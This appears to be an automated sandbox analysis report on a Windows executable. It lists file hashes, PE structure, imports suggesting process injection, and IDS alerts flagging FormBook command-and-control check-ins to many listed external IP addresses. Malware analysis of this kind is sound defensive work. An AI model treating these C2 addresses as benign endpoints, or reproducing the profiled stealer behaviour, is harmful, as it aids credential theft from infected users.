                                                                                                              • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:p4rsJEIb7k.exe
                                                                                                              File size:1'335'565 bytes
                                                                                                              MD5:159afc06a66a86f332be92f52963b09e
                                                                                                              SHA1:0cb60fe78cad1919e4c1ef5d315752e9147a7792
                                                                                                              SHA256:64b147e7c878171760935be6fde4ba79aedf2e045e78ad8a4eaf235ce60f6fdf
                                                                                                              SHA512:b8151e8b1da1be56be3e7903d4ae9e5240b3c074323ce5f56fe37ef80d8b2ca5d0778430c8d6d76b2f9559101537014a3b1a9989d315b1096105f4a9aface259
                                                                                                              SSDEEP:24576:ffmMv6Ckr7Mny5QLap2VGs1bTZb2Th8U4xkWo5e:f3v+7/5QLa0UE2T29xi5e
                                                                                                              TLSH:CB55F112B7D680F6E9A33875197BE32AEB3575184333C49BA7E02F778E111509B363A1
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                              File Icon

                                                                                                              Icon Hash:1733312925935517

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x416310
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              call 00007FEA2C953E8Ch
                                                                                                              jmp 00007FEA2C947C5Eh
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                                              mov eax, ecx
                                                                                                              mov edx, ecx
                                                                                                              add eax, esi
                                                                                                              cmp edi, esi
                                                                                                              jbe 00007FEA2C947DEAh
                                                                                                              cmp edi, eax
                                                                                                              jc 00007FEA2C947F8Ah
                                                                                                              cmp ecx, 00000100h
                                                                                                              jc 00007FEA2C947E01h
                                                                                                              cmp dword ptr [004A94E0h], 00000000h
                                                                                                              je 00007FEA2C947DF8h
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              and edi, 0Fh
                                                                                                              and esi, 0Fh
                                                                                                              cmp edi, esi
                                                                                                              pop esi
                                                                                                              pop edi
                                                                                                              jne 00007FEA2C947DEAh
                                                                                                              pop esi
                                                                                                              pop edi
                                                                                                              pop ebp
                                                                                                              jmp 00007FEA2C94824Ah
                                                                                                              test edi, 00000003h
                                                                                                              jne 00007FEA2C947DF7h
                                                                                                              shr ecx, 02h
                                                                                                              and edx, 03h
                                                                                                              cmp ecx, 08h
                                                                                                              jc 00007FEA2C947E0Ch
                                                                                                              rep movsd
                                                                                                              jmp dword ptr [00416494h+edx*4]
                                                                                                              nop
                                                                                                              mov eax, edi
                                                                                                              mov edx, 00000003h
                                                                                                              sub ecx, 04h
                                                                                                              jc 00007FEA2C947DEEh
                                                                                                              and eax, 03h
                                                                                                              add ecx, eax
                                                                                                              jmp dword ptr [004163A8h+eax*4]
                                                                                                              jmp dword ptr [004164A4h+ecx*4]
                                                                                                              nop
                                                                                                              jmp dword ptr [00416428h+ecx*4]
                                                                                                              nop
                                                                                                              mov eax, E4004163h
                                                                                                              arpl word ptr [ecx+00h], ax
                                                                                                              or byte ptr [ecx+eax*2+00h], ah
                                                                                                              and edx, ecx
                                                                                                              mov al, byte ptr [esi]
                                                                                                              mov byte ptr [edi], al
                                                                                                              mov al, byte ptr [esi+01h]
                                                                                                              mov byte ptr [edi+01h], al
                                                                                                              mov al, byte ptr [esi+02h]
                                                                                                              shr ecx, 02h
                                                                                                              mov byte ptr [edi+02h], al
                                                                                                              add esi, 03h
                                                                                                              add edi, 03h
                                                                                                              cmp ecx, 08h
                                                                                                              jc 00007FEA2C947DAEh

                                                                                                              Rich Headers

                                                                                                              Programming Language:
                                                                                                              • [ASM] VS2008 SP1 build 30729
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [C++] VS2008 SP1 build 30729
                                                                                                              • [ C ] VS2005 build 50727
                                                                                                              • [IMP] VS2005 build 50727
                                                                                                              • [ASM] VS2008 build 21022
                                                                                                              • [RES] VS2008 build 21022
                                                                                                              • [LNK] VS2008 SP1 build 30729

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                              RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                              RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                              RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                              RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                              RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                              RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                              RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                              RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                              RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                              RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                              RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                              GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                              OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishGreat Britain
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-11-05T15:32:44.165921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978413.248.169.4880TCP
                                                                                                              2024-11-05T15:32:44.165921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977650.19.214.22780TCP
                                                                                                              2024-11-05T15:32:44.165921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978013.248.169.4880TCP
                                                                                                              2024-11-05T15:34:08.941947+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974266.198.240.1580TCP
                                                                                                              2024-11-05T15:34:11.580511+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974366.198.240.1580TCP
                                                                                                              2024-11-05T15:34:14.253474+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974466.198.240.1580TCP
                                                                                                              2024-11-05T15:34:23.592824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497463.33.130.19080TCP
                                                                                                              2024-11-05T15:34:24.837039+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497473.33.130.19080TCP
                                                                                                              2024-11-05T15:34:27.476841+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497483.33.130.19080TCP
                                                                                                              2024-11-05T15:34:35.855883+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049750161.97.142.14480TCP
                                                                                                              2024-11-05T15:34:38.588553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049751161.97.142.14480TCP
                                                                                                              2024-11-05T15:34:41.309600+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049752161.97.142.14480TCP
                                                                                                              2024-11-05T15:34:50.887348+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049754119.18.54.2780TCP
                                                                                                              2024-11-05T15:34:53.830801+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049755119.18.54.2780TCP
                                                                                                              2024-11-05T15:34:56.767004+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756119.18.54.2780TCP
                                                                                                              2024-11-05T15:35:13.774587+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049758195.110.124.13380TCP
                                                                                                              2024-11-05T15:35:16.505439+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049759195.110.124.13380TCP
                                                                                                              2024-11-05T15:35:19.245333+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760195.110.124.13380TCP
                                                                                                              2024-11-05T15:35:27.504676+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049762203.161.41.20480TCP
                                                                                                              2024-11-05T15:35:30.186171+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049763203.161.41.20480TCP
                                                                                                              2024-11-05T15:35:32.899013+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049764203.161.41.20480TCP
                                                                                                              2024-11-05T15:35:41.092159+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976668.65.122.22280TCP
                                                                                                              2024-11-05T15:35:43.804362+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976768.65.122.22280TCP
                                                                                                              2024-11-05T15:35:46.535572+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976868.65.122.22280TCP
                                                                                                              2024-11-05T15:35:55.809116+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977045.150.55.1580TCP
                                                                                                              2024-11-05T15:35:58.640786+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977145.150.55.1580TCP
                                                                                                              2024-11-05T15:36:01.490476+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977245.150.55.1580TCP
                                                                                                              2024-11-05T15:36:09.772169+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977450.19.214.22780TCP
                                                                                                              2024-11-05T15:36:12.409312+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977550.19.214.22780TCP
                                                                                                              2024-11-05T15:36:23.036417+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977813.248.169.4880TCP
                                                                                                              2024-11-05T15:36:25.655112+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977913.248.169.4880TCP
                                                                                                              2024-11-05T15:36:44.482485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978213.248.169.4880TCP
                                                                                                              2024-11-05T15:36:47.121639+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978313.248.169.4880TCP
                                                                                                              2024-11-05T15:37:08.338105+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978615.197.148.3380TCP
                                                                                                              2024-11-05T15:37:09.581393+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978715.197.148.3380TCP
                                                                                                              2024-11-05T15:37:12.223040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978815.197.148.3380TCP
                                                                                                              2024-11-05T15:37:29.149397+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979166.198.240.1580TCP
                                                                                                              2024-11-05T15:37:31.810088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979266.198.240.1580TCP
                                                                                                              2024-11-05T15:37:34.473216+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979366.198.240.1580TCP
                                                                                                              2024-11-05T15:37:43.210516+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497953.33.130.19080TCP
                                                                                                              2024-11-05T15:37:44.932497+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497963.33.130.19080TCP
                                                                                                              2024-11-05T15:37:48.476833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497973.33.130.19080TCP
                                                                                                              2024-11-05T15:37:55.603118+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049799161.97.142.14480TCP
                                                                                                              2024-11-05T15:37:58.325732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049800161.97.142.14480TCP
                                                                                                              2024-11-05T15:38:01.041140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049801161.97.142.14480TCP
                                                                                                              2024-11-05T15:38:09.702925+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049803119.18.54.2780TCP
                                                                                                              2024-11-05T15:38:12.662197+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804119.18.54.2780TCP
                                                                                                              2024-11-05T15:38:15.603651+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805119.18.54.2780TCP
                                                                                                              2024-11-05T15:38:32.210487+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049807195.110.124.13380TCP
                                                                                                              2024-11-05T15:38:34.973478+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808195.110.124.13380TCP
                                                                                                              2024-11-05T15:38:37.704461+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809195.110.124.13380TCP
                                                                                                              2024-11-05T15:38:45.871561+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049811203.161.41.20480TCP
                                                                                                              2024-11-05T15:38:48.576607+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049812203.161.41.20480TCP
                                                                                                              2024-11-05T15:38:51.290785+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049813203.161.41.20480TCP
                                                                                                              2024-11-05T15:38:59.383238+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981568.65.122.22280TCP
                                                                                                              2024-11-05T15:39:02.104820+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981668.65.122.22280TCP
                                                                                                              2024-11-05T15:39:04.831001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981768.65.122.22280TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 5, 2024 15:33:52.431838989 CET4974180192.168.11.20104.21.94.87
                                                                                                              Nov 5, 2024 15:33:52.535099030 CET8049741104.21.94.87192.168.11.20
